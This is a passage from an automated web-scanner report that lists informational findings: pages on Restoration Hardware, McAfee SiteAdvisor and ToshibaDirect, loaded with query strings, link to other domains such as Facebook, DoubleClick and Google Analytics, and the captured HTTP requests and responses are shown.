       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...
<li class="level-1-static babyandchild"><a href="http://www.rhbabyandchild.com/index.jsp" target="_blank"><span>
...[SNIP]...
<li><a target="_blank" href="http://www.facebook.com/RestorationHardware">Visit Us on Facebook</a></li>
                       <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:188px; height:35px;" allowTransparency="true"></iframe>
...[SNIP]...

17.57. https://www.restorationhardware.com/my-account/sign-in.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/sign-in.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin

The response contains the following link to another domain:

https://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35

Request

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:55 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:55 GMT
Content-Length: 19152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...
</li>
                       <iframe src="https://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:188px; height:35px;" allowTransparency="true"></iframe>
...[SNIP]...

17.58. http://www.siteadvisor.com/download/windows.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.siteadvisor.com
Path:	/download/windows.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.siteadvisor.com/download/windows.html?cid=64895

The response contains the following links to other domains:

http://home.mcafee.com/
http://home.mcafee.com/Root/AboutUs.aspx?id=privacy
http://home.mcafee.com/Store/FreeTrial.aspx
http://images.scanalert.com/meter/www.mcafee.com/55.gif?lang=EN
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://us.mcafee.com/root/offer.asp?id=266730&cid=86873
http://www.mcafee.com/us/about/contact/index.html
http://www.mcafee.com/us/about/index.html
https://sadownload.mcafee.com/products/SA/Website/saSetup.exe
https://www.mcafeesecure.com/RatingVerify?ref=www.siteadvisor.com&lang=EN

Request

GET /download/windows.html?cid=64895 HTTP/1.1
Host: www.siteadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cid=64895; s_cc=true; s_campaign=64895; s_nr=1305509542874-Repeat; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 40225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li id="about-nav"><a href="http://www.mcafee.com/us/about/index.html" target="_blank">About McAfee</a>
...[SNIP]...
<li id="contact-nav"><a href="http://www.mcafee.com/us/about/contact/index.html" target="_blank">Contact us</a>
...[SNIP]...

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.siteadvisor.com&lang=EN"><img width="65" height="37" border="1" src="//images.scanalert.com/meter/www.mcafee.com/55.gif?lang=EN" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams." oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;" /></a>
...[SNIP]...
<div class="firstcolumn of-two-dwin-banner" style="float:left;">
<a class="universal-dloadbtn-dl-1" href="http://home.mcafee.com/Store/FreeTrial.aspx" onclick="trackCustomLink(this,'Free Trial')" target="_blank"><span style="color:#AA0828;">
...[SNIP]...
<div class="firstcolumn of-two-dwin-banner" style="float:left;">
<a class="universal-dloadbtn-dl-2" href="http://us.mcafee.com/root/offer.asp?id=266730&cid=86873" onclick="trackCustomLink(this,'SiteAdvisor Plus')" target="_blank"><span style="color:#AA0828;">
...[SNIP]...
<div><a class="dwin-dloadbtn-header" href="https://sadownload.mcafee.com/products/SA/Website/saSetup.exe" onClick="trackDownload(this,'https://sadownload.mcafee.com/products/SA/Website/saSetup.exe')"><span>
...[SNIP]...
<div style="padding-top:10px">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<li><a href="http://home.mcafee.com/Root/AboutUs.aspx?id=privacy" target="_blank">Privacy Policy</a>
...[SNIP]...
<li><a href="http://home.mcafee.com" target="_blank">McAfee Home</a>
...[SNIP]...

17.59. http://www.toshibadirect.com/td/b2c/laptops.to previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toshibadirect.com
Path:	/td/b2c/laptops.to

Issue detail

The page was loaded from a URL containing a query string:

http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=1000873;type=toshi381;cat=noteb727;num=42154056;ord=1?
http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1?
http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=lapto438;ord=1;num=1?
http://images.scanalert.com/meter/survey/www.toshibadirect.com/31.gif
http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=
http://syndication.intel.com/DistributeModule.aspx?id=15004
http://syndication.intel.com/DistributeModule.aspx?ppc_cid=IIP_02105071701&cc=US&contentType=0
http://us.toshiba.com/
http://us.toshiba.com/innovation-lab/green
http://view.atdmt.com/iaction/dei10b_TDLaptops_4
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/globalEntitlement.jsp?

nav=Warranty
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp?nav=Download
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/navShell.jsp?cf=su_contact
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=ProdReg
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.la.bbb.org/BusinessReport.aspx?CompanyID=41153
http://www.microsoft.com/windows/internet-explorer/default.aspx
http://www.toshiba.com/tai/
https://ssl.google-analytics.com/urchin.js
https://www.csdsupport.toshiba.com/tais/csd/support/cgi-bin/vp_register.cgi
https://www.scanalert.com/RatingVerify?ref=www.toshibadirect.com

Request

GET /td/b2c/laptops.to?page=segHHO HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 293930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<script language="Java
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=lapto438;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0 style="display:none"></IFRAME>
...[SNIP]...
<br />
To fully experience ToshibaDirect.com we recommend upgrading to the latest version of Internet Explorer. <a href="http://www.microsoft.com/windows/internet-explorer/default.aspx" target="_blank">Upgrade Now »</a>
...[SNIP]...
<dd class="sub-menu-item laptop-family"> <a href="http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=" name="&lid=TopNav_SpecialOffers_SignUpForEmails"><h4>
...[SNIP]...
<li class="menu-item last">
<a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp" name="&lid=TopNav_Support">Support</a>
...[SNIP]...
<dd class="sub-menu-item laptop-family first"><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp" name="&lid=TopNav_Support_TechSupportCenter"><h4>
...[SNIP]...
<dd class="sub-menu-item laptop-family"><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=ProdReg" name="&lid=TopNav_Support_RegisterYourLaptop"><h4>
...[SNIP]...
<dd class="sub-menu-item laptop-family last"><a href="https://www.csdsupport.toshiba.com/tais/csd/support/cgi-bin/vp_register.cgi" name="&lid=TopNav_Support_RegisterYourTV"><h4>
...[SNIP]...
</script>

<script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js"></script>
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/dei10b_TDLaptops_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<li>Intel® <a target="s15004" href="http://syndication.intel.com/DistributeModule.aspx?id=15004" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=15004', 's15004', 'resizable=1,scrollbars=0,width=470,height=245');win.focus();">Atom</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li>Intel® <a target="s15004" href="http://syndication.intel.com/DistributeModule.aspx?id=15004" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=15004', 's15004', 'resizable=1,scrollbars=0,width=470,height=245');win.focus();">Atom</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li>Intel® <a target="_blank" href="http://syndication.intel.com/DistributeModule.aspx?ppc_cid=IIP_02105071701&cc=US&contentType=0" onclick="return intel(this)" class="intel-pentium-locked" title="Click here to learn more about Intel® Pentium® Processors">Pentium®</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li><a href="http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=">Sign Up for Emails</a>
...[SNIP]...
<li><a href="http://us.toshiba.com/">us.toshiba.com</a>
...[SNIP]...
<li><a href="http://www.toshiba.com/tai/">Toshiba USA</a>
...[SNIP]...
<li><a href="http://us.toshiba.com/innovation-lab/green">Recycle & Trade-in</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/navShell.jsp?cf=su_contact">Contact

Support</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp?nav=Download">Downloads &

Drivers</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/globalEntitlement.jsp?

nav=Warranty">Warranty & Service</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp">Tech Support Home</a>
...[SNIP]...
<div class="logos">
<a target="_blank" href="http://www.la.bbb.org/BusinessReport.aspx?CompanyID=41153"><img alt=""

src="/images/ui5/bbbLogo.gif"></a>
<a href="https://www.scanalert.com/RatingVerify?ref=www.toshibadirect.com" target="_blank"><img width="65"
height="37" border="0" oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." src="//images.scanalert.com/meter/survey/www.toshibadirect.com/31.gif"></a>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<IMG STYLE="position:absolute; " SRC="http://ad.doubleclick.net/activity;src=1000873;type=toshi381;cat=noteb727;num=42154056;ord=1?" WIDTH="1" HEIGHT="1" BORDER="0">
...[SNIP]...

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.60. http://www.toshibadirect.com/td/b2c/laptops.to previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toshibadirect.com
Path:	/td/b2c/laptops.to

Issue detail

The page was loaded from a URL containing a query string:

http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=1000873;type=toshi381;cat=noteb727;num=65821692;ord=1?
http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1?
http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=lapto438;ord=1;num=1?
http://images.scanalert.com/meter/survey/www.toshibadirect.com/31.gif
http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=
http://syndication.intel.com/DistributeModule.aspx?id=15004
http://syndication.intel.com/DistributeModule.aspx?ppc_cid=IIP_02105071701&cc=US&contentType=0
http://us.toshiba.com/
http://us.toshiba.com/innovation-lab/green
http://view.atdmt.com/iaction/dei10b_TDLaptops_4
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/globalEntitlement.jsp?

nav=Warranty
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp?nav=Download
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/navShell.jsp?cf=su_contact
http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=ProdReg
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35
http://www.la.bbb.org/BusinessReport.aspx?CompanyID=41153
http://www.microsoft.com/windows/internet-explorer/default.aspx
http://www.toshiba.com/tai/
https://ssl.google-analytics.com/urchin.js
https://www.csdsupport.toshiba.com/tais/csd/support/cgi-bin/vp_register.cgi
https://www.scanalert.com/RatingVerify?ref=www.toshibadirect.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:34:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1110806401.1305542050@@@@;Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 293675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<script language="Java
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=lapto438;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0 style="display:none"></IFRAME>
...[SNIP]...
<br />
To fully experience ToshibaDirect.com we recommend upgrading to the latest version of Internet Explorer. <a href="http://www.microsoft.com/windows/internet-explorer/default.aspx" target="_blank">Upgrade Now »</a>
...[SNIP]...
<dd class="sub-menu-item laptop-family"> <a href="http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=" name="&lid=TopNav_SpecialOffers_SignUpForEmails"><h4>
...[SNIP]...
<li class="menu-item last">
<a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp" name="&lid=TopNav_Support">Support</a>
...[SNIP]...
<dd class="sub-menu-item laptop-family first"><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp" name="&lid=TopNav_Support_TechSupportCenter"><h4>
...[SNIP]...
<dd class="sub-menu-item laptop-family"><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=ProdReg" name="&lid=TopNav_Support_RegisterYourLaptop"><h4>
...[SNIP]...
<dd class="sub-menu-item laptop-family last"><a href="https://www.csdsupport.toshiba.com/tais/csd/support/cgi-bin/vp_register.cgi" name="&lid=TopNav_Support_RegisterYourTV"><h4>
...[SNIP]...
</script>

<script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js"></script>
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/dei10b_TDLaptops_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<li>Intel® <a target="s15004" href="http://syndication.intel.com/DistributeModule.aspx?id=15004" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=15004', 's15004', 'resizable=1,scrollbars=0,width=470,height=245');win.focus();">Atom</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
